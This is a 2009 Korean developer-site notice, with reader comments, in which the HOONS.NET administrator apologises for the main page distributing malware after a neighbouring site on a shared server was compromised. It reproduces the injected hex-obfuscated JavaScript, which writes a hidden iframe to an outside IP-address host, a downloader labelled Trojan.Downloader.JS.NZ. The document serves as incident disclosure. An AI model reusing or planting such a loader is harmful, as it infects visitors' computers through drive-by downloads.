공지사항

이틀간 이용에 불편을 드려 죄송합니다. HOONS 평점: 10.0/10 (1명 참여) 조회: 3895
어제 오전과 오늘 오전에 메인 페이지를 통해서 악성코드를 내보내린 점에 대해서 정중히 사과드립니다.
(훈스를 죽여요 죽여 ㅠㅠ)

훈스닷넷 서버에서 해킹할 수 있는 aspx 같은 파일이나 웹쉘의 업로드를 통한 공격을 다 막아 놓은 상태였으나
훈스와 같은 서버에서 운영되던 다른 웹사이트가 뚫리면서 훈스에 악성코드를 심어 버렸습니다.
(열심히 운전하는데 뒤에서 박아버리는 케이스)

앞으로 이런일이 없도록 훈스닷넷 서버를 격리조치를 취해준다고 합니다만
구글에서 90일동안 검색정지를 당했고, 파폭, 크롬에서 안전하지 않은 사이트로 차단되고 있습니다.(ㅠㅠ)

오전에 배포되던 바이러스는 Trojan.Downloader.JS.NZ 악성코드였습니다.
메인 페이지에 IFrame을 이용해서 다음과 같은 스크립트를 심어 공격을 하게 됩니다.
(궁금하시는분들이 있을까해서 저도 봐도 잘 모르겠군요..)

〈script〉function v47ee86589b684(v47ee86589ba7e)《  return(parseInt(v47ee86589ba7e,16));》function v47ee86589c674(v47ee86589ca6f)《  var v47ee86589ce6b='';for(v47ee86589d267=0; v47ee86589d267〈v47ee86589ca6f.length; v47ee86589d267+=2)《 v47ee86589ce6b+=(String.fromCharCode(v47ee86589b684(v47ee86589ca6f.substr(v47ee86589d267, 2))));》return v47ee86589ce6b;》 document.write(v47ee86589c674('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696
672616D65206E616D653D363734333139343265207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E
69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3331343238292B276336626
5635C272077696474683D3937206865696768743D333234207374796C653D5C27646973706C61793A206E6F6E655C273E3C2
F696672616D653E27293C2F5343524950543E'));〈/script〉


태그 : 사죄 이용불편
작성자 정보
HOONS
Level 99
 [EXP.만랩]

메일:  비공개

글등록 +12 140 덧글등록 +3 5722
자기소개
글 공유하기 |
  tweet facebook
2009-11-18 오전 11:57:52
나도한마디
사용자
엔젤루스            [2009-11-18]
Level 99
 [EXP.만랩]
저 스크립트 무슨내용인지? ㅎㄷㄷ
사용자
머스카            [2009-11-18]
Level 19
 [EXP.8/70]
스크립트가 어째 숫자랑 영어밖에 없네요..;; 어질어질..
사용자
테드            [2009-11-18]
Level 14
 [EXP.11/40]
카스퍼스키가 다행히 바이러스 바로 잡긴 했습니다 -0-
사용자
김드류            [2009-11-18]
Level 54
 [EXP.3/250]
...저게 무엇일까..
사용자
SHooN            [2009-11-18]
Level 11
 [EXP.9/40]
그래서 크롬이.. 계속 악성코드.... 유포사이트라고 뜨는군요!!
사용자
화랑            [2009-11-18]
Level 99
 [EXP.만랩]
아 그렇군횽 -0-;;;
사용자
샤쟈            [2009-11-20]
Level 17
 [EXP.30/70]
저게뭘까!!! @_@??? 앜 궁금!! >_<
사용자
근무중            [2009-11-21]
Level 17
 [EXP.54/70]
저게 무엇인지..아시는분 해석좀?? ㅋㅋ 외계어인가~.~)a
사용자
김현우            [2009-11-23]
Level 16
 [EXP.42/70]
document.write 가 처리될 시점에는 String.fromCharCode 를 통해(일반 명령문으로 변환) 자바스크립트가 실행되게 되어 있습니다. 자바스크립트의 보안버그를 이용하겠죠...

보안업데이트가 되어 있지 않은 컴퓨터는 악성코드에 감염되지 않을까 싶습니다.
사용자
삼만돌이            [2009-11-24]
Level 64
 [EXP.23/250]
저게.. 무슨 의미일가요.. ㅋㅋ
태그로 엮인글
글리스트
블렌드메이트 '친구추가 이벤트'에 참여해주세요~[8]+4  ★도온
2009년 HOONS닷넷 결산보고[10]+4  HOONS
2010년 HOONS닷넷 제5기 운영진이 선출되었습니다. [28]+9  HOONS
[세미나 자료] 닷넷 성능 튜닝과 완소테크닉 점검[17]+5 파일첨부 김수영
[수정 공지] 훈스닷넷 송년회 모임(날짜수정)[19]+5  해피동
[공지] 2009 훈스닷넷 송년회 공지 입니다.[27]+29  해피동
SQLER 1회 세미나- 저장프로시져, 쿼리 튜닝[5]+1  HOONS
17회 정기세미나 발표자료[6]+2  HOONS
[2009 FINAL 세미나] 닷넷성능튜닝과 완소테크닉 점검[11]  HOONS
2010년 훈스닷넷을 이끌어갈 운영진을 모집합니다.[10]+3  HOONS
 ★현재글->   이틀간 이용에 불편을 드려 죄송합니다.[10]+1  HOONS
[초대] 커뮤니케이션 비전 2009 콘퍼런스[7]+3  서동진
[정기세미나] 최신트랜드를 반영한 닷넷 게시판 만들기[13]+1  HOONS
마이크로소프트 테크데이 2009[4]  HOONS
16회 정기세미나 모금액을 요셉의원에 후원하고 왔습니다.[5] 파일첨부 김수영
월간 마소의 윈도우7 세미나[8]+1  HOONS
제 16회 정기세미나 - RIA, 아이디에서 구현까지[8]+3  서동진
HOONS닷넷 광고및 수익금 처리안내[14]+3  HOONS
HOONS닷넷 두번째 오프라인 벙개모임 공지[33]+31  해피동
리믹스09가 열리네요.[4]  HOONS
C# in Depth 번역서가 출간되었습니다.[15]+3  HOONS